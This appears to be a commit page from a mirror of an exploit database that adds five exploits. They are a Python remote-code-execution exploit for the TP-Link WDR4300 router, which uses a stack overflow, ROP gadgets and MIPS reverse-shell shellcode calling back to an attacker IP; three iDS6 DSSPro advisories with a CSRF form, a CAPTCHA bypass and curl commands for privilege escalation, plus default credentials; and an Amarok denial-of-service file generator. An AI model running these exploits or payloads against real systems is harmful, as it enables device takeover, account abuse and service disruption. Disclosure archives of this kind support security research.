bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-11-06

Browse source 
5 changes to exploits/shellcodes

Amarok 2.8.0 - Denial-of-Service

TP-Link WDR4300 - Remote Code Execution (Authenticated)
iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)
iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass
iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation
This commit is contained in:
Offensive Security 2020-11-06 05:01:58 +00:00
parent 543f8dc781
commit 6eb03eae23
6 changed files with 498 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

219
exploits/hardware/remote/48994.py Executable file
View file

@ -0,0 +1,219 @@
# Exploit Title: TP-Link WDR4300 - Remote Code Execution (Authenticated)
# Date: 2020-08-28
# Exploit Author: Patrik Lantz
# Vendor Homepage: https://www.tp-link.com/se/home-networking/wifi-router/tl-wdr4300/
# Version: TL-WDR4300, N750 Wireless Dual Band Gigabit Router
# Tested on: Firmware version 3.13.33 and 3.14.3
# CVE : CVE-2017-13772
#!/usr/bin/python3
import sys
import hashlib
import base64
import requests
import binascii
import socket
"""
RCE via stack-based overflow on TP-Link WDR4300 (N750) devices, using CVE-2017-13772.
Tested on Firmware versions 3.13.33, Build 130618 and 3.14.3 Build 150518, hardware WDR4300 v1
Usage:
1) Start listener on attacker machine: nc -nlvvp 31337
2) Execute script: python exploit.py <attacker_ip>
"""
def main(argv):
if len(sys.argv) < 2:
print("Usage: python exploit.py <attacker_ip>")
sys.exit(1)
password = "admin"
target = "192.168.0.1:80"
attacker_ip = sys.argv[1]
attacker = binascii.hexlify(socket.inet_aton(attacker_ip))
ip = [attacker[i:i+2] for i in range(0, len(attacker), 2)]
if '00' in ip or '20' in ip:
print("[-] Specified attacker IP will result in bad characters being present in the shellcode. Avoid any IPs containing .0. and .32.")
sys.exit(1)
url = "http://" + target + "/"
try:
r = requests.get(url=url)
except:
print("[-] Could not connect to target: " + target)
sys.exit(1)
if 'WWW-Authenticate' in r.headers.keys():
if not 'WDR4300' in r.headers['WWW-Authenticate']:
print("[-] This is not TP-Link WDR4300 (N750)")
sys.exit(1)
else:
print("[-] This does not seem to be the web interface of a router!")
credentials = "admin" + ":" + hashlib.md5(password).hexdigest()
auth = base64.b64encode(credentials)
url = "http://" + target + "/userRpm/LoginRpm.htm?Save=Save"
print("[+] Setting target to: " + target)
print("[+] Using default admin password: " + password)
print("[+] Cookie set to: Authorization=Basic%20" + auth)
h = {}
h["Cookie"] = "Authorization=Basic%20" + auth
h['Upgrade-Insecure-Requests'] = '1'
h['Referer'] = 'http://' + target + '/'
r = requests.get(url = url, headers=h)
data = r.text
if "httpAutErrorArray" in data:
print('[-] Could not login to the admin interface')
sys.exit(1)
older_fw = False
# older firmware, e.g., 3.13.33
if "<TITLE>Login Incorrect</TITLE>" in data:
print("[-] Incorrect login, perhaps an older firmware? Sending digest authetnication using the Authorization header instead..")
credentials = "admin:" + password
auth = base64.b64encode(credentials)
url = "http://" + target + "/"
h = {}
h["Authorization"] = "Basic%20" + auth
h['Upgrade-Insecure-Requests'] = '1'
h['Referer'] = 'http://' + target + '/'
r = requests.get(url = url, headers=h)
data = r.text
if 'window.parent.location.href' not in data:
print("[-] Failed to login to the admin interface")
sys.exit(1)
print('[+] Older firmware confirmed, successfully logged in')
older_fw = True
authenticated_url = data.split('window.parent.location.href = ')[1].split(';')[0].replace('"','')
unique_id = ''
if not older_fw:
unique_id = authenticated_url.split('/userRpm')[0].split('/')[3] + '/'
print("[+] Authentication succeeded, got unique id: " + unique_id.replace('/',''))
# now we deliver the exploit payload via a GET request
h['Referer'] = 'http://' + target + '/' + unique_id + 'userRpm/DiagnosticRpm.htm'
# NOP sled (XOR $t0, $t0, $t0; as NOP is only null bytes)
nopsled = ""
for i in range(12):
nopsled += "\x26\x40\x08\x01"
# identified bad characters: 0x20,0x00
# Using reverse tcp shellcode from https://www.exploit-db.com/exploits/45541
buf = b""
buf += "\x24\x0f\xff\xfa" # li $t7, -6
buf += "\x01\xe0\x78\x27" # nor $t7, $zero
buf += "\x21\xe4\xff\xfd" # addi $a0, $t7, -3
buf += "\x21\xe5\xff\xfd" # addi $a1, $t7, -3
buf += "\x28\x06\xff\xff" # slti $a2, $zero, -1
buf += "\x24\x02\x10\x57" # li $v0, 4183 ( sys_socket )
buf += "\x01\x01\x01\x0c" # syscall 0x40404
buf += "\xaf\xa2\xff\xff" # sw $v0, -1($sp)
buf += "\x8f\xa4\xff\xff" # lw $a0, -1($sp)
buf += "\x34\x0f\xff\xfd" # li $t7, -3 ( sa_family = AF_INET )
buf += "\x01\xe0\x78\x27" # nor $t7, $zero
buf += "\xaf\xaf\xff\xe0" # sw $t7, -0x20($sp)
buf += "\x3c\x0e\x7a\x69" # lui $t6, 0x7a69 ( sin_port = 0x7a69 )
buf += "\x35\xce\x7a\x69" # ori $t6, $t6, 0x7a69
buf += "\xaf\xae\xff\xe4" # sw $t6, -0x1c($sp)
buf += "\x3c\x0e" + ip[0].decode('hex') + ip[1].decode('hex') # lui $t6, 0xAABB ( sin_addr = 0xAABB ...
buf += "\x35\xce" + ip[2].decode('hex') + ip[3].decode('hex') # ori $t6, $t6, 0xCCDD ... 0xCCDD
buf += "\xaf\xae\xff\xe6" # sw $t6, -0x1a($sp)
buf += "\x27\xa5\xff\xe2" # addiu $a1, $sp, -0x1e
buf += "\x24\x0c\xff\xef" # li $t4, -17 ( addrlen = 16 )
buf += "\x01\x80\x30\x27" # nor $a2, $t4, $zero
buf += "\x24\x02\x10\x4a" # li $v0, 4170 ( sys_connect )
buf += "\x01\x01\x01\x0c" # syscall 0x40404
buf += "\x24\x0f\xff\xfd" # li t7,-3
buf += "\x01\xe0\x28\x27" # nor a1,t7,zero
buf += "\x8f\xa4\xff\xff" # lw $a0, -1($sp)
buf += "\x24\x02\x0f\xdf" # li $v0, 4063 ( sys_dup2 )
buf += "\x01\x01\x01\x0c" # syscall 0x40404
buf += "\x24\xa5\xff\xff" # addi a1,a1,-1 (\x20\xa5\xff\xff)
buf += "\x24\x01\xff\xff" # li at,-1
buf += "\x14\xa1\xff\xfb" # bne a1,at, dup2_loop
buf += "\x28\x06\xff\xff" # slti $a2, $zero, -1
buf += "\x3c\x0f\x2f\x2f" # lui $t7, 0x2f2f
buf += "\x35\xef\x62\x69" # ori $t7, $t7, 0x6269
buf += "\xaf\xaf\xff\xec" # sw $t7, -0x14($sp)
buf += "\x3c\x0e\x6e\x2f" # lui $t6, 0x6e2f
buf += "\x35\xce\x73\x68" # ori $t6, $t6, 0x7368
buf += "\xaf\xae\xff\xf0" # sw $t6, -0x10($sp)
buf += "\xaf\xa0\xff\xf4" # sw $zero, -0xc($sp)
buf += "\x27\xa4\xff\xec" # addiu $a0, $sp, -0x14
buf += "\xaf\xa4\xff\xf8" # sw $a0, -8($sp)
buf += "\xaf\xa0\xff\xfc" # sw $zero, -4($sp)
buf += "\x27\xa5\xff\xf8" # addiu $a1, $sp, -8
buf += "\x24\x02\x0f\xab" # li $v0, 4011 (sys_execve)
buf += "\x01\x01\x01\x0c" # syscall 0x40404
shellcode = nopsled + buf
"""
We control $ra, $s0 and $s1 via the buffer overflow.
libc_base: 0x2aae2000
First ROP (sleep_gadget): 0x0004c974 + libc_base = 0x2ab2e974
0x0004c97c move t9, s0
0x0004c980 lw ra, (var_1ch)
0x0004c984 lw s0, (var_18h)
0x0004c988 addiu a0, zero, 2 ; arg1
0x0004c98c addiu a1, zero, 1 ; arg2
0x0004c990 move a2, zero
0x0004c994 jr t9
sleep is located at 0x00053ca0 => so $s0 = 0x2ab35ca0
This gadget calls sleep, in this gadget we also set the return adress to the second ROP gadget which is controlled by setting appropriate value on the stack location 0x1c($sp), i.e., the first value on the stack, due to the instruction at 0x0004c980.
Second ROP (stack_gadget): 0x00039fa8 + libc_base = 0x2ab1bfa8
0x00039fa8 addiu s0, sp, 0x28
0x00039fac move a0, s3
0x00039fb0 move a1, s0
0x00039fb4 move t9, s1
0x00039fb8 jalr t9
This gadget will set s0 to point our shellcode on the stack, that must be located at sp+0x28.
Then as we control s1, we jump to the last and third ROP gadget.
Third ROP (call_gadget): 0x000406d8 + libc_base = 0x2ab226d8
0x000406d8 move t9, s0
0x000406dc jalr t9
Jump to the shellcode pointed in s0.
"""
sleep_addr = "\x2a\xb3\x5c\xa0"
sleep_gadget = "\x2a\xb2\xe9\x74"
stack_gadget = "\x2a\xb1\xbf\xa8"
call_gadget = "\x2a\xb2\x26\xd8"
junk = "J"*28
payload = "A"*160 + sleep_addr + call_gadget + sleep_gadget + junk + stack_gadget + shellcode
p = {'ping_addr': payload, 'doType': 'ping', 'isNew': 'new', 'sendNum': '4', 'pSize':64, 'overTime':'800', 'trHops':'20'}
url = "http://" + target + "/" + unique_id + "userRpm/PingIframeRpm.htm"
print("[+] Delivering exploit payload to: " + url)
try:
r = requests.get(url = url, params=p, headers=h, timeout=10)
except:
print("[+] Finished delivering exploit")
if __name__ == "__main__":
main(sys.argv[1:])

61
exploits/hardware/webapps/48990.txt Normal file
View file

@ -0,0 +1,61 @@
# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)
# Date: 2020-07-16
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.yerootech.com
# Version: 6.2
iDS6 DSSPro Digital Signage System 6.2 Cross-Site Request Forgery (CSRF)
Vendor: Guangzhou Yeroo Tech Co., Ltd.
Product web page: http://www.yerootech.com
Affected version: V6.2 B2014.12.12.1220
V5.6 B2017.07.12.1757
V4.3
Summary: iDS6 Software's DSSPro network digital signage management system
is a web-based server software solution for Windows.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Microsoft Windows XP
Microsoft Windows 7
Microsfot Windows Server 2008
Microsoft Windows Server 2012
Microsoft Windows 10
Apache Tomcat/8.0.44
Apache Tomcat/6.0.35
Apache-Coyote/1.1
Apache Axis/1.4
MySQL 5.5.25
Java 1.8.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5606
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5606.php
16.07.2020
--
Add user:
---------
<html>
<body>
<form action="http://192.168.1.88/Pages/user!addUser" method="POST">
<input type="hidden" name="user.userName" value="testingus" />
<input type="hidden" name="user.password" value="zeroscience" />
<input type="submit" value="add()" />
</form>
</body>
</html>

77
exploits/hardware/webapps/48991.txt Normal file
View file

@ -0,0 +1,77 @@
# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass
# Date: 2020-07-16
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.yerootech.com
# Version: 6.2
iDS6 DSSPro Digital Signage System 6.2 CAPTCHA Security Bypass
Vendor: Guangzhou Yeroo Tech Co., Ltd.
Product web page: http://www.yerootech.com
Affected version: V6.2 B2014.12.12.1220
V5.6 B2017.07.12.1757
V4.3
Summary: iDS6 Software's DSSPro network digital signage management
system is a web-based server software solution for Windows.
Desc: The CAPTCHA function for DSSPro is prone to a security bypass
vulnerability that occurs in the CAPTCHA authentication routine. By
requesting the autoLoginVerifyCode object an attacker can receive a
JSON message code and successfully bypass the CAPTCHA-based authentication
challenge and perform brute-force attacks.
Tested on: Microsoft Windows XP
Microsoft Windows 7
Microsfot Windows Server 2008
Microsoft Windows Server 2012
Microsoft Windows 10
Apache Tomcat/8.0.44
Apache Tomcat/6.0.35
Apache-Coyote/1.1
Apache Axis/1.4
MySQL 5.5.25
Java 1.8.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5607
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5607.php
16.07.2020
--
Get CAPTCHA code:
-----------------
$ curl -i http://192.168.1.88/Pages/login\!autoLoginVerifyCode -c cookies.txt
{"success":true,"message":"6435","data":"6435"}
Use CAPTCHA code:
-----------------
$ curl -i http://192.168.1.88/Pages/login\!userValidate -b cookies.txt -d "shortName=&user.userName=boss&user.password=boss&loginVerifyCode=6435&autoSave=true&autoLogin=true&domain_login=" -v
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: cookie.username=boss; Expires=Wed, 21-Jul-2021 19:41:26 GMT
Set-Cookie: cookie.password=boss; Expires=Wed, 01-Jul-2021 19:41:26 GMT
Set-Cookie: cookie.autosave=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT
Set-Cookie: cookie.autologin=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/x-json;charset=UTF-8
Date: Tue, 21 Jul 2020 19:41:26 GMT
Connection: close
Content-Length: 16
{"success":true}

121
exploits/hardware/webapps/48992.txt Normal file
View file

@ -0,0 +1,121 @@
# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation
# Date: 2020-07-16
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.yerootech.com
# Version: 6.2
iDS6 DSSPro Digital Signage System 6.2 Improper Access Control Privilege Escalation
Vendor: Guangzhou Yeroo Tech Co., Ltd.
Product web page: http://www.yerootech.com
Affected version: V6.2 B2014.12.12.1220
V5.6 B2017.07.12.1757
V4.3
Summary: iDS6 Software's DSSPro network digital signage management system
is a web-based server software solution for Windows.
Desc: The application suffers from a privilege escalation vulnerability.
An authenticated user can elevate his/her privileges by calling JS functions
from the console or by insecure direct object references to hidden functionalities
that can result in creating users, modifying roles and permissions and full
takeover of the application.
Tested on: Microsoft Windows XP
Microsoft Windows 7
Microsfot Windows Server 2008
Microsoft Windows Server 2012
Microsoft Windows 10
Apache Tomcat/8.0.44
Apache Tomcat/6.0.35
Apache-Coyote/1.1
Apache Axis/1.4
MySQL 5.5.25
Java 1.8.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5608
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5608.php
16.07.2020
--
--------------------
Default credentials:
--------------------
admin:123456 (id: n/k, access: /admin)
boss:boss (id: 100001, access: /)
user:user (id: 100002, access: /)
----------------------------
Once logged-in, create user:
----------------------------
In Console, once navigated to the Accounts->User page (http://192.168.1.88/Pages/user.action)
Type: add()
or issue a POST request:
$ curl -d "user.userName=testingus&user.password=testingus" http://192.168.1.88/Pages/user\!addUser -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
--------------
List user IDs:
--------------
$ curl -d "az=asc" http://192.168.1.88/Pages/user\!list -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
------------
Create role:
------------
In Console, once navigated to the Accounts->Role page (http://192.168.1.88/Pages/role.action):
Type: add()
or issue a POST request:
$ curl -d "role.roleName=ROLENAME&role.description=ROLEDESC" http://192.168.1.88/Pages/role\!add -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
--------------
List role IDs:
--------------
$ curl -X POST http://192.168.1.88/Pages/role\!list -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
------------------------------------------
Apply all permissions to the created role:
------------------------------------------
$ curl http://192.168.1.88/Pages/role\!updatePermissions -d "role.roleId={ROLE_ID}&privileges=2&privileges=1&privileges=3&privileges=4&privileges=7&privileges=6&privileges=5&privileges=12&privileges=8&privileges=13&privileges=9&privileges=10&privileges=11&privileges=14&privileges=16&privileges=15&privileges=17&privileges=18&privileges=21&privileges=33&privileges=32&privileges=34&privileges=35&privileges=36&privileges=37&privileges=23&privileges=22&privileges=24&privileges=41&privileges=47&privileges=46&privileges=48&privileges=49&privileges=50&privileges=51&privileges=52&privileges=53"
------------------------------------
Assign created role to created user:
------------------------------------
$ curl -d "user.userId={USER_ID}&roles={ROLE_ID}" http://192.168.1.88/Pages/user\!updateRole -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
------------
Delete user:
------------
In Console, once navigated to the Accounts->User page (http://192.168.1.88/Pages/user.action), select desired username:
Type: del()
or issue a POST request:
$ curl -d "userid={USER_ID}" http://192.168.1.88/Pages/user\!del -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"

15
exploits/windows/local/48993.pl Executable file
View file

@ -0,0 +1,15 @@
# Exploit Title: Amarok 2.8.0 - Denial-of-Service
# Date: 1 November 2020
# Exploit Author: FishballAndMeatball
# Vendor Homepage: https://amarok.kde.org/
# Software link: https://community.kde.org/Amarok/GettingStarted/Download
# Version: Amarok 2.8.0
# Tested on: Windows 10, Windows 7, Windows XP
# CVE: CVE-2020-13152
my $file= test_big.m3u;
my $junk= \x41 x 6368545;
open($FILE,>$file);
print $FILE $junk;
close($FILE);
print m3u File Created successfully\n;

5
files_exploits.csv
View file

@ -10399,6 +10399,7 @@ id,file,description,date,author,type,platform,port
48968,exploits/windows/local/48968.txt,"IP Watcher v3.0.0.30 - 'PACService.exe' Unquoted Service Path",2020-10-28,"Mohammed Alshehri",local,windows,
48982,exploits/windows/local/48982.pdf,"Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)",2020-11-02,"Nassim Asrir",local,windows,
48983,exploits/windows/local/48983.txt,"Quick N Easy FTP Service 3.2 - Unquoted Service Path",2020-11-02,yunaranyancat,local,windows,
48993,exploits/windows/local/48993.pl,"Amarok 2.8.0 - Denial-of-Service",2020-11-05,FishballAndMeatball,local,windows,
42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@ -17837,6 +17838,7 @@ id,file,description,date,author,type,platform,port
48842,exploits/hardware/remote/48842.py,"Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow",2020-10-01,LiquidWorm,remote,hardware,
48954,exploits/hardware/remote/48954.txt,"Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root",2020-10-27,LiquidWorm,remote,hardware,
48958,exploits/hardware/remote/48958.py,"GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse",2020-10-27,LiquidWorm,remote,hardware,
48994,exploits/hardware/remote/48994.py,"TP-Link WDR4300 - Remote Code Execution (Authenticated)",2020-11-05,"Patrik Lantz",remote,hardware,
42806,exploits/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution",2017-09-27,SlidingWindow,remote,java,
42888,exploits/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",remote,hardware,
42891,exploits/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution",2017-09-28,hyp3rlinx,remote,windows,
@ -40808,6 +40810,9 @@ id,file,description,date,author,type,platform,port
48987,exploits/php/webapps/48987.txt,"PDW File Browser 1.3 - Remote Code Execution",2020-11-04,"David Bimmel",webapps,php,
48988,exploits/php/webapps/48988.py,"School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-04,Mosaaed,webapps,php,
48989,exploits/php/webapps/48989.py,"Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-04,Mosaaed,webapps,php,
48990,exploits/hardware/webapps/48990.txt,"iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)",2020-11-05,LiquidWorm,webapps,hardware,
48991,exploits/hardware/webapps/48991.txt,"iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass",2020-11-05,LiquidWorm,webapps,hardware,
48992,exploits/hardware/webapps/48992.txt,"iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation",2020-11-05,LiquidWorm,webapps,hardware,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,

Can't render this file because it is too large.